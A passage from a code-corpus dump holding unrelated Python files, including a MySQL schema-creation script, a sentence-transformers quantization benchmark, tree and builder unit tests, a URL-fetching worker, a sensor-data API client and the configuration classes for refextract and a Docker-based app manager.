ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_BENEFICIAIRE_CTT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (
`INT_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_ID` INT NOT NULL,
`INT_DATEINTERVENTION` DATE NOT NULL,
`INT_PRESENCEANIMALMOYEN` TINYINT(1) NOT NULL DEFAULT 0,
`NOTES` VARCHAR(300) NULL,
`CTT_ID` INT NOT NULL,
`TPI_ID` INT NOT NULL,
PRIMARY KEY (`INT_ID`),
INDEX `fk_TR_INTERVENTION_INT_1_idx` (`TPI_ID` ASC),
INDEX `fk_TR_INTERVENTION_INT_2_idx` (`CTT_ID` ASC),
CONSTRAINT `fk_TR_INTERVENTION_INT_1`
FOREIGN KEY (`TPI_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`TR_TYPEINTERVENTION_TPI` (`TPI_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TR_INTERVENTION_INT_2`
FOREIGN KEY (`CTT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_INTERVENTION_INT Table created successfully')
##############
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` (
`INTCO_ID` INT NOT NULL AUTO_INCREMENT,
`DATEEVENEMENT` DATETIME(6) NOT NULL,
`VALEUR` VARCHAR(45) NOT NULL,
`PDT_ID` INT NOT NULL,
`INTCO_ADRESSEIP` VARCHAR(20) NOT NULL,
PRIMARY KEY (`INTCO_ID`),
INDEX `fk_TR_COMMUNICATION_COM_1_idx` (`PDT_ID` ASC),
CONSTRAINT `fk_TR_COMMUNICATION_COM_1`
FOREIGN KEY (`PDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_INTERCONNEXION_INTCO Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` (
`PDT_SERIALNUMBER` INT NOT NULL,
`INT_ID` INT NOT NULL,
`NOTES` VARCHAR(300) NULL,
`LOC_ID` INT NOT NULL,
`CTT_ID` INT NOT NULL,
`ADR_ID` INT NOT NULL,
INDEX `fk_TJ_CTT_ADR_PDT_INT_2_idx` (`LOC_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_3_idx` (`PDT_SERIALNUMBER` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_4_idx` (`INT_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_5_idx` (`CTT_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_1_idx` (`ADR_ID` ASC),
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_2`
FOREIGN KEY (`LOC_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`TE_LOCALISATIONPRODUIT_LOC` (`LOC_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_3`
FOREIGN KEY (`PDT_SERIALNUMBER`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_4`
FOREIGN KEY (`INT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_5`
FOREIGN KEY (`CTT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_1`
FOREIGN KEY (`ADR_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (`ADR_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print("table jointure T_J_CTT_ADR_PDT_INT créée ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (
`PEM_NUMEROSIREN` INT NOT NULL,
`PEM_RAISONSOCIALE` VARCHAR(45) NOT NULL,
`PEM_TYPEACTIVITE` VARCHAR(60) NOT NULL,
`PEM_SIRET` VARCHAR(45) NULL,
PRIMARY KEY (`PEM_NUMEROSIREN`),
INDEX `index2` (`PEM_RAISONSOCIALE` ASC))
ENGINE = InnoDB;""")
print('T_E_PERSONNEMORALE_PEM créée')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` (
`EMP_ID` INT NOT NULL,
`PEM_ID` INT NOT NULL,
`INT_ID` INT NOT NULL,
`EMP_TELEPHONE` CHAR(15) NOT NULL,
`EMP_EMAIL` VARCHAR(45) NOT NULL,
INDEX `fk_TE_PRESTATAIRE_PREST_2_idx` (`PEM_ID` ASC),
INDEX `fk_TE_PRESTATAIRE_PREST_3_idx` (`INT_ID` ASC),
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_1`
FOREIGN KEY (`EMP_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_2`
FOREIGN KEY (`PEM_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (`PEM_NUMEROSIREN`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_3`
FOREIGN KEY (`INT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_J_EMPLOYE_EMP Table created successfully')
cursor.execute("""SET SQL_MODE=@OLD_SQL_MODE;""")
cursor.execute("""SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;""")
cursor.execute("""SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;""")
except mysql.connector.Error as error:
print("Failed to create table in MySQL: {}".format(error))
finally:
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
| StarcoderdataPython |
1615887 | """
A quantized model executes some or all of the operations with integers rather than floating point values. This allows for a more compact models and the use of high performance vectorized operations on many hardware platforms.
As a result, you get about 40% smaller and faster models. The speed-up depends on your CPU and how PyTorch was build and can be anywhere between 10% speed-up and 300% speed-up.
Note: Quantized models are only available for CPUs. Use a GPU, if available, for optimal performance.
For more details:
https://pytorch.org/docs/stable/quantization.html
"""
import logging
import os
import torch
from sentence_transformers import LoggingHandler, SentenceTransformer, util, InputExample
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator
from torch.nn import Embedding, Linear
from torch.quantization import quantize_dynamic
import gzip
import csv
import time
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
handlers=[LoggingHandler()])
#### /print debug information to stdout
#Check if dataset exsist. If not, download and extract it
sts_dataset_path = 'datasets/stsbenchmark.tsv.gz'
if not os.path.exists(sts_dataset_path):
util.http_get('https://sbert.net/datasets/stsbenchmark.tsv.gz', sts_dataset_path)
#Limit torch to 4 threads
torch.set_num_threads(4)
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO)
### /print debug information to stdout
model_name = 'all-distilroberta-v1'
# Load a named sentence model (based on BERT). This will download the model from our server.
# Alternatively, you can also pass a filepath to SentenceTransformer()
model = SentenceTransformer(model_name, device='cpu')
q_model = quantize_dynamic(model, {Linear, Embedding})
# Convert the dataset to a DataLoader ready for training
logging.info("Read STSbenchmark dataset")
test_samples = []
sentences = []
with gzip.open(sts_dataset_path, 'rt', encoding='utf8') as fIn:
reader = csv.DictReader(fIn, delimiter='\t', quoting=csv.QUOTE_NONE)
for row in reader:
score = float(row['score']) / 5.0 # Normalize score to range 0 ... 1
inp_example = InputExample(texts=[row['sentence1'], row['sentence2']], label=score)
sentences.append(row['sentence1'])
sentences.append(row['sentence2'])
if row['split'] == 'test':
test_samples.append(inp_example)
sentences = sentences[0:10000]
logging.info("Evaluating speed of unquantized model")
start_time = time.time()
emb = model.encode(sentences, show_progress_bar=True)
diff_normal = time.time() - start_time
logging.info("Done after {:.2f} sec. {:.2f} sentences / sec".format(diff_normal, len(sentences) / diff_normal))
logging.info("Evaluating speed of quantized model")
start_time = time.time()
emb = q_model.encode(sentences, show_progress_bar=True)
diff_quantized = time.time() - start_time
logging.info("Done after {:.2f} sec. {:.2f} sentences / sec".format(diff_quantized, len(sentences) / diff_quantized))
logging.info("Speed-up: {:.2f}".format(diff_normal / diff_quantized))
#########
evaluator = EmbeddingSimilarityEvaluator.from_input_examples(test_samples, name='sts-test')
logging.info("Evaluate regular model")
model.evaluate(evaluator)
print("\n\n")
logging.info("Evaluate quantized model")
q_model.evaluate(evaluator)
| StarcoderdataPython |
121157 | <filename>tests/twitter_learning_journal/builders/test_detail_builder.py<gh_stars>1-10
from pytest import mark
from app.twitter_learning_journal.builders.detail_builder import DetailBuilder
from app.twitter_learning_journal.models.tweet import Tweet
def test_detail_builder_init():
tweet = Tweet()
detail_builder = DetailBuilder(tweet)
assert tweet == detail_builder.tweet
assert 'blog' == detail_builder.default_detail_type
def test_build_details():
expected_title = 'full_text'
expected_type = 'blog'
tweet = Tweet(
id=1,
full_text=f'{expected_title}\ntest',
urls='urls',
classification='classification'
)
detail_builder = DetailBuilder(tweet)
detail = detail_builder.build()
assert expected_title == detail.title
assert tweet.id == detail.tweet_id
assert tweet.urls == detail.url
assert expected_type == detail.type
assert not detail.is_fully_classified
assert tweet.classification == detail.classification
assert detail_builder.default_detail_size == detail.count
@mark.parametrize('expected_title, full_text', [
('hello', 'hello\nsometest'),
('sometest', '\nsometest'),
('', ''),
('123456789112345678921234567893', '123456789112345678921234567893XXX'),
('candace', '\n\n\ncandace\nsome text'),
])
def test_title(expected_title, full_text):
tweet = Tweet(full_text=full_text)
detail_builder = DetailBuilder(tweet)
assert expected_title == detail_builder.title
| StarcoderdataPython |
1677706 | import shutil
import requests
from projects.workers.base import Worker
from projects.workers.exceptions import *
class FetchURL(Worker):
id = 'fetch_url'
name = 'fetch_url'
image = ''
description = """
Fetch URL Ccntent. Limitations:
1. Uses HTTP GET Method
2. Max of 3 redirects
3. Max file size is 10Megabytes
"""
schema = {
"type": "object",
"properties": {
"in": {
"type": "string",
"format": "url",
"description": "URL to fetch content from"
},
"out": {
"type": [
"string",
"null"
],
"description": "URL content"
}
}
}
def process(self, data):
session = requests.Session()
session.max_redirects = 3
# ~10 Megabytes
max_file_size = 10000000
# OPTIONS request
options = session.options(data)
if 'GET' not in options.headers.get('Allow'):
raise WorkerNoInputException(
'Remote endpoint has no GET in Options'
)
head = session.head(data)
if int(head.headers.get('Content-Length', 0)) > max_file_size:
raise WorkerNoInputException(
'Remote endpoint response size exceeds 10 Megabytes'
)
response = session.get(data)
response.raise_for_status()
result = response.text
return result
| StarcoderdataPython |
3380474 | from custom_envs.pybulletgym_custom.envs import register # this is included to trigger env loading | StarcoderdataPython |
1607528 | <filename>shop_app/utils/__init__.py
# -*- coding: utf-8 -*-
# @Time : 2020/10/27 下午1:47
# @Author : 司云中
# @File : __init__.py.py
# @Software: Pycharm | StarcoderdataPython |
3272879 | import os
import hypertune
import tensorflow as tf
class HypertuneHook(tf.train.SessionRunHook):
def __init__(self):
self.hypertune = hypertune.HyperTune()
self.hp_metric_tag = os.environ.get('CLOUD_ML_HP_METRIC_TAG', '')
self.trial_id = os.environ.get('CLOUD_ML_TRIAL_ID', 0)
def end(self, session):
step_variable = session.graph.get_collection('global_step')
global_step = session.run(step_variable)[0]
tf.logging.info('HypertuneHook called, tag: {}, trial_id: {}, global_step: {}'.format(self.hp_metric_tag, self.trial_id, global_step))
# The name of the tensor is given in metric_fn in resnet_main_hypertune.py.
metric_tensor = session.graph.get_tensor_by_name('top_5_accuracy/value:0')
metric_value = session.run(metric_tensor)
self.hypertune.report_hyperparameter_tuning_metric(
hyperparameter_metric_tag=self.hp_metric_tag,
metric_value=metric_value,
global_step=global_step)
| StarcoderdataPython |
1692689 | <filename>Data-Structures/tree/test_tree.py
from tree import _Node, BinaryTree, BinarySearchTree, Queue
import pytest
@pytest.fixture
def my_bst():
tree = BinarySearchTree()
tree.add(15)
tree.add(11)
tree.add(13)
tree.add(7)
tree.add(8)
tree.add(5)
tree.add(19)
tree.add(17)
tree.add(23)
return tree
def test_tree_instance():
tree = BinaryTree()
assert tree._root is None
def test_tree_one_member():
tree = BinarySearchTree()
tree.add('apples')
assert tree._root.value == 'apples'
def test_add_three_members():
tree = BinarySearchTree()
tree.add(10)
tree.add(5)
tree.add(15)
assert tree._root.value == 10
assert tree._root.left.value == 5
assert tree._root.right.value == 15
def test_add_more_members_for_balanced():
tree = BinarySearchTree()
tree.add(15)
tree.add(11)
tree.add(13)
tree.add(7)
tree.add(25)
tree.add(60)
tree.add(23)
assert tree._root.value == 15
assert tree._root.left.value == 11
assert tree._root.right.value == 25
assert tree._root.left.left.value == 7
assert tree._root.left.right.value == 13
assert tree._root.right.right.value == 60
assert tree._root.right.left.value == 23
def test_add_more_members_for_imbalanced(my_bst):
assert my_bst._root.value == 15
assert my_bst._root.left.value == 11
assert my_bst._root.left.right.value == 13
assert my_bst._root.left.left.value == 7
assert my_bst._root.left.left.left.value == 5
assert my_bst._root.left.left.right.value == 8
def test_add_one_node():
tree = BinarySearchTree()
tree.add(20)
assert tree._root.value == 20
assert tree._root.left == None
assert tree._root.right == None
def test_check_one_node_tree():
tree = BinarySearchTree()
tree.add(20)
assert tree.contains(20) == True
assert tree.contains(21) == False
def test_contains_true(my_bst):
assert my_bst._root.value == 15
assert my_bst.contains(7) == True
assert my_bst.contains(9) == False
def test_pre_order(my_bst):
assert my_bst.pre_order() == [15, 11, 7, 5, 8, 13, 19, 17, 23]
def test_pre_order_one():
tree_one = BinarySearchTree()
tree_one.add(20)
assert tree_one.pre_order() == [20]
def test_in_order(my_bst):
assert my_bst.in_order() == [5, 7, 8, 11, 13, 15, 17, 19, 23]
def test_post_order(my_bst):
assert my_bst.post_order() == [5, 8, 7, 13, 11, 17, 23, 19, 15]
def test_breadth_first_binarysearch(my_bst):
assert BinaryTree.breadth_first(my_bst) == [15, 11, 19, 7, 13, 17, 23, 5, 8]
def test_breadth_first_binarytree_empty():
tree = BinaryTree()
assert BinaryTree.breadth_first(tree) == []
def test_breadth_first_binarytree_one_element():
tree = BinaryTree()
tree._root = _Node(8)
assert BinaryTree.breadth_first(tree) == [8]
def test_breadth_first_binarytree_with_letters():
tree = BinaryTree()
tree._root = _Node(8)
tree._root.left = _Node("a")
tree._root.right = _Node(-2)
assert BinaryTree.breadth_first(tree) == [8, "a", -2]
tree._root.left.left = _Node(195)
tree._root.left.right = _Node("cat")
tree._root.right.right = _Node(8)
tree._root.left.left.left = _Node(-0.56)
tree._root.left.left.right = _Node(9)
tree._root.right.right.right = _Node(23)
tree._root.right.right.right.left = _Node([5, 7])
assert BinaryTree.breadth_first(tree) == [8, "a", -2, 195,"cat", 8, -0.56, 9, 23, [5,7]]
| StarcoderdataPython |
3385172 | <filename>venv_biblio_v1/lib/python2.7/site-packages/refextract/references/config.py
# -*- coding: utf-8 -*-
#
# This file is part of refextract.
# Copyright (C) 2005, 2006, 2007, 2008, 2010, 2011, 2015, 2016 CERN.
#
# refextract is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# refextract is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with refextract; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
"""refextract configuration."""
from __future__ import unicode_literals
import os
try:
from shutil import which
except ImportError:
# CPython <3.3
from distutils.spawn import find_executable as which
import pkg_resources
# Version number:
CFG_PATH_GFILE = os.environ.get('CFG_PATH_GFILE', which('file'))
CFG_PATH_PDFTOTEXT = os.environ.get('CFG_PATH_PDFTOTEXT', which('pdftotext'))
# Module config directory
CFG_KBS_DIR = pkg_resources.resource_filename('refextract.references', 'kbs')
CFG_REFEXTRACT_KBS = {
'journals': "%s/journal-titles.kb" % CFG_KBS_DIR,
'journals-re': "%s/journal-titles-re.kb" % CFG_KBS_DIR,
'report-numbers': "%s/report-numbers.kb" % CFG_KBS_DIR,
'authors': "%s/authors.kb" % CFG_KBS_DIR,
'collaborations': "%s/collaborations.kb" % CFG_KBS_DIR,
'books': "%s/books.kb" % CFG_KBS_DIR,
'conferences': "%s/conferences.kb" % CFG_KBS_DIR,
'publishers': "%s/publishers.kb" % CFG_KBS_DIR,
'special-journals': "%s/special-journals.kb" % CFG_KBS_DIR,
}
# Reference fields:
CFG_REFEXTRACT_FIELDS = {
'misc': 'm',
'linemarker': 'o',
'doi': 'a',
'hdl': 'a',
'reportnumber': 'r',
'journal': 's',
'url': 'u',
'urldesc': 'z',
'author': 'h',
'title': 't',
'isbn': 'i',
'publisher': 'p',
'year': 'y',
'collaboration': 'c',
'recid': '0',
}
# Internal tags are used by refextract to mark-up recognised citation
# information.
CFG_REFEXTRACT_MARKER_OPENING_REPORT_NUM = r"<cds.REPORTNUMBER>"
CFG_REFEXTRACT_MARKER_OPENING_TITLE = r"<cds.JOURNAL>"
CFG_REFEXTRACT_MARKER_OPENING_TITLE_IBID = r"<cds.JOURNALibid>"
CFG_REFEXTRACT_MARKER_OPENING_SERIES = r"<cds.SER>"
CFG_REFEXTRACT_MARKER_OPENING_VOLUME = r"<cds.VOL>"
CFG_REFEXTRACT_MARKER_OPENING_YEAR = r"<cds.YR>"
CFG_REFEXTRACT_MARKER_OPENING_PAGE = r"<cds.PG>"
CFG_REFEXTRACT_MARKER_OPENING_QUOTED = r"<cds.QUOTED>"
CFG_REFEXTRACT_MARKER_OPENING_ISBN = r"<cds.ISBN>"
CFG_REFEXTRACT_MARKER_OPENING_PUBLISHER = r"<cds.PUBLISHER>"
CFG_REFEXTRACT_MARKER_OPENING_COLLABORATION = r"<cds.COLLABORATION>"
# These are the "closing tags:
CFG_REFEXTRACT_MARKER_CLOSING_REPORT_NUM = r"</cds.REPORTNUMBER>"
CFG_REFEXTRACT_MARKER_CLOSING_TITLE = r"</cds.JOURNAL>"
CFG_REFEXTRACT_MARKER_CLOSING_TITLE_IBID = r"</cds.JOURNALibid>"
CFG_REFEXTRACT_MARKER_CLOSING_SERIES = r"</cds.SER>"
CFG_REFEXTRACT_MARKER_CLOSING_VOLUME = r"</cds.VOL>"
CFG_REFEXTRACT_MARKER_CLOSING_YEAR = r"</cds.YR>"
CFG_REFEXTRACT_MARKER_CLOSING_PAGE = r"</cds.PG>"
CFG_REFEXTRACT_MARKER_CLOSING_QUOTED = r"</cds.QUOTED>"
CFG_REFEXTRACT_MARKER_CLOSING_ISBN = r"</cds.ISBN>"
CFG_REFEXTRACT_MARKER_CLOSING_PUBLISHER = r"</cds.PUBLISHER>"
CFG_REFEXTRACT_MARKER_CLOSING_COLLABORATION = r"</cds.COLLABORATION>"
# Of the form '</cds.AUTHxxxx>' only
CFG_REFEXTRACT_MARKER_CLOSING_AUTHOR_STND = r"</cds.AUTHstnd>"
CFG_REFEXTRACT_MARKER_CLOSING_AUTHOR_ETAL = r"</cds.AUTHetal>"
CFG_REFEXTRACT_MARKER_CLOSING_AUTHOR_INCL = r"</cds.AUTHincl>"
# The minimum length of a reference's misc text to be deemed insignificant.
# when comparing misc text with semi-colon defined sub-references.
# Values higher than this value reflect meaningful misc text.
# Hence, upon finding a correct semi-colon, but having current misc text
# length less than this value (without other meaningful reference objects:
# report numbers, titles...) then no split will occur.
# (A higher value will increase splitting strictness. i.e. Fewer splits)
CGF_REFEXTRACT_SEMI_COLON_MISC_TEXT_SENSITIVITY = 60
# The length of misc text between two adjacent authors which is
# deemed as insignificant. As such, when misc text of a length less
# than this value is found, then the latter author group is dumped into misc.
# (A higher value will increase splitting strictness. i.e. Fewer splits)
CGF_REFEXTRACT_ADJACENT_AUTH_MISC_SEPARATION = 10
# Maximum number of lines for a citation before it is considered invalid
CFG_REFEXTRACT_MAX_LINES = 25
| StarcoderdataPython |
175583 | from django.urls import path, include
from rest_framework import routers
from catalogue.api.views import (
ProductViewSet,
ProductCategoryViewSet,
MediaUploadViewSet,
AttributeGroupViewSet,
ProductAttributeViewSet,
ProductAttributeValueViewSet,
ProductStockViewSet,
)
router = routers.DefaultRouter()
router.register(r"products", ProductViewSet, "products")
router.register(
r"product-categories", ProductCategoryViewSet, "product_categories"
)
router.register(r"media-uploads", MediaUploadViewSet, "media_uploads")
router.register(r"attribute-groups", AttributeGroupViewSet, "attribute_groups")
router.register(
r"product-attributes", ProductAttributeViewSet, "product_attributes"
)
router.register(
r"product-attribute-values",
ProductAttributeValueViewSet,
"product_attribute_values",
)
router.register(r"product-stock", ProductStockViewSet, "product_stock")
urlpatterns = [path("", include(router.urls))]
| StarcoderdataPython |
16126 | import datetime
import os, sys
import pprint
import requests
from pandas.io.json import json_normalize
import pandas as pd
URL = 'https://wsn.latice.eu/api/query/v2/'
#URL = 'http://localhost:8000/wsn/api/query/v2/'
#TOKEN = os.getenv('WSN_TOKEN')
TOKEN = os.getenv('WSN_TOKEN')
path = os.getcwd()
def query(
limit=100, # Pagination
fields=None, # Fields to return (all by default)
tags=None, # Tags to return (all by default)
interval=None, # If given will return the average in the interval
debug=False, # Not sent to the API
# Filters
time__gte=None, time__lte=None, # Time is special
**kw):
# Parameters
if time__gte:
time__gte = time__gte.timestamp()
if time__lte:
time__lte = time__lte.timestamp()
params = {
'limit': limit, # Pagination
'time__gte': time__gte, 'time__lte': time__lte, # Time filter
'fields': fields,
'tags': tags,
'interval': interval,
}
# Filter inside json
for key, value in kw.items():
if value is None:
params[key] = None
continue
if type(value) is datetime.datetime:
value = int(value.timestamp())
if isinstance(value, int):
key += ':int'
params[key] = value
# Query
headers = {'Authorization': 'Token %s' % TOKEN}
response = requests.get(URL, headers=headers, params=params)
response.raise_for_status()
json = response.json()
# Debug
if debug:
pprint.pprint(params)
pprint.pprint(json)
print()
return json
def get_token():
try:
token = os.environ['WSN_TOKEN']
return token
except KeyError:
print("Please set the environment variable WSN_TOKEN in .bashrc as follow: \n\t export WSN_TOKEN=xxxxxxxxxxxxxxxxx ")
sys.exit(1)
def query_df(
limit=100, # Pagination
fields=None, # Fields to return (all by default)
tags=None, # Tags to return (all by default)
interval=None, # If given will return the average in the interval
debug=False, # Not sent to the API
# Filters
time__gte=None, time__lte=None, # Time is special
**kw):
# Parameters
if time__gte:
time__gte = time__gte.timestamp()
if time__lte:
time__lte = time__lte.timestamp()
params = {
'limit': limit, # Pagination
'time__gte': time__gte, 'time__lte': time__lte, # Time filter
'fields': fields,
'tags': tags,
'interval': interval,
}
# Filter inside json
for key, value in kw.items():
if value is None:
params[key] = None
continue
if type(value) is datetime.datetime:
value = int(value.timestamp())
if isinstance(value, int):
key += ':int'
params[key] = value
# Query
headers = {'Authorization': 'Token %s' % TOKEN}
response = requests.get(URL, headers=headers, params=params)
response.raise_for_status()
json = response.json()
# Debug
if debug:
pprint.pprint(params)
pprint.pprint(json)
print()
df = json_normalize(json['results']) # convert json object to pandas dataframe
try:
df.time = pd.to_datetime(df.time)
except:
print('WARNING: no timestamp')
return df
def biomet_metadata():
meta = pd.read_csv(path + '/FINSE-stationary_variables_biomet.csv', sep=';')
return meta
if __name__ == '__main__':
# We need an authentication token
TOKEN = os.getenv('WSN_TOKEN')
# Number of elements to return in every query
limit = 100
# Example 1: Get all the fields and tags of a given mote from a given time.
# This is good to explore the data, but bad on performance.
response = query(limit=limit,
serial=0x1F566F057C105487,
time__gte=datetime.datetime(2017, 11, 15),
debug=True,
)
# Example 2: Get the RSSI of an Xbee module identified by its address
print('==============================================')
response = query(limit=limit,
source_addr_long=0x0013A2004105D4B6,
fields=['rssi'],
debug=True,
)
# Example 3: Get the battery and internal temperature from all motes,
# include the serial tag to tell them apart.
# Frames that don't have at least one of the fields we ask for will not be
# included.
print('==============================================')
response = query(limit=limit,
fields=['bat', 'in_temp'],
tags=['serial'],
debug=True,
)
# Example 4: Get the time the frame was received by the Pi
print('==============================================')
response = query(limit=limit,
serial=408520806,
fields=['received'],
debug=True,
)
# Example 5: Get the battery once every hour
response = query(limit=10,
serial=0x1F566F057C105487,
fields=['bat'],
interval=3600,
debug=True,
)
| StarcoderdataPython |
3227654 | <gh_stars>0
import os
import tornado.options
from docker import tls
from traitlets import HasTraits, Int, Unicode, Bool, Dict
from remoteappmanager import paths
from remoteappmanager.traitlets import set_traits_from_dict
class FileConfig(HasTraits):
"""Configuration options for the application server.
They are sourced from the configuration file.
"""
##########
# Configuration file options. All of these come from the config file.
tls = Bool(False,
help="If True, connect to docker with tls")
tls_verify = Bool(True,
help="If True, verify the CA certificate against a "
"known or self-signed CA certificate")
tls_ca = Unicode("", help="Path to CA certificate for docker TLS")
tls_cert = Unicode("", help="Path to client certificate for docker TLS")
tls_key = Unicode("", help="Path to client key for docker TLS")
docker_host = Unicode("", help="The docker host to connect to")
#: Docker realm is a label added to containers started by this deployment
#: of simphony-remote. You should change this to something unique only if
#: your machine is already running other simphony-remote instances, all
#: using the same docker server. Failing to do that would allow different
#: simphony-remote instances to see (and interact with) each other's
#: containers.
docker_realm = Unicode(
"remoteexec",
help="The docker realm. Identifies which containers belong to a "
"specific instance of simphony-remote.")
database_class = Unicode(
default_value="remoteappmanager.db.orm.ORMDatabase",
help="The import path to a subclass of ABCDatabase")
database_kwargs = Dict(
default_value={'url': 'sqlite:///remoteappmanager.db'},
help="The keyword arguments for initialising the Database instance")
login_url = Unicode(default_value="/hub",
help=("The url to be redirected to if the user is not "
"authenticated for pages that require "
"authentication"))
# The network timeout for any async operation we have to perform,
# in seconds. 30 seconds is plenty enough.
network_timeout = Int(default_value=30,
help="The timeout (seconds) for network operations")
template_path = Unicode(
default_value=paths.template_dir,
help="The path where to search for jinja templates")
static_path = Unicode(
default_value=paths.static_dir,
help="The path where to search for static files")
ga_tracking_id = Unicode(
help="The google analytics tracking id"
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Sets the default of the docker configuration options from the
# current environment. These will possibly be overridded by
# the appropriate entries in the configuration file when parse_file
# is invoked
env = os.environ
self.docker_host = env.get("DOCKER_HOST", "")
if self.docker_host == "":
self.docker_host = "unix://var/run/docker.sock"
# Note that definedness, not value, is considered, meaning
# that defining DOCKER_TLS_VERIFY=0 will still evaluate to True.
# This is consistent with both docker behavior and general shell
# practice.
self.tls_verify = (env.get("DOCKER_TLS_VERIFY", "") != "")
# We don't have an envvar way of saying TLS = True, so we rely on
# TLS_VERIFY set status
self.tls = self.tls_verify
cert_path = env.get("DOCKER_CERT_PATH",
os.path.join(os.path.expanduser("~"), ".docker"))
self.tls_cert = os.path.join(cert_path, 'cert.pem')
self.tls_key = os.path.join(cert_path, 'key.pem')
self.tls_ca = os.path.join(cert_path, 'ca.pem')
if self.tls:
self.docker_host = self.docker_host.replace('tcp://', 'https://')
# -------------------------------------------------------------------------
# Public
def parse_config(self, config_file):
"""Parses the config file, and assign their values to our local traits.
"""
# Keep the file line parser isolated, but use the global one
# so that we can get the help of the command line options.
file_line_parser = tornado.options.OptionParser()
for traitlet_name, traitlet in self.traits().items():
# tornado.OptionParser defines an option with a Python type
# and performs type validation.
default_value = getattr(self, traitlet_name)
file_line_parser.define(
traitlet_name,
default=default_value,
type=type(default_value),
help=traitlet.help)
# Let it raise the exception if the file is not there.
# We always want the config file to be present, even if empty
try:
file_line_parser.parse_config_file(config_file)
except FileNotFoundError:
raise tornado.options.Error(
'Could not find specified configuration'
' file "{}"'.format(config_file))
set_traits_from_dict(self, file_line_parser.as_dict())
if self.tls or self.tls_verify:
self.docker_host = self.docker_host.replace('tcp://', 'https://')
def docker_config(self):
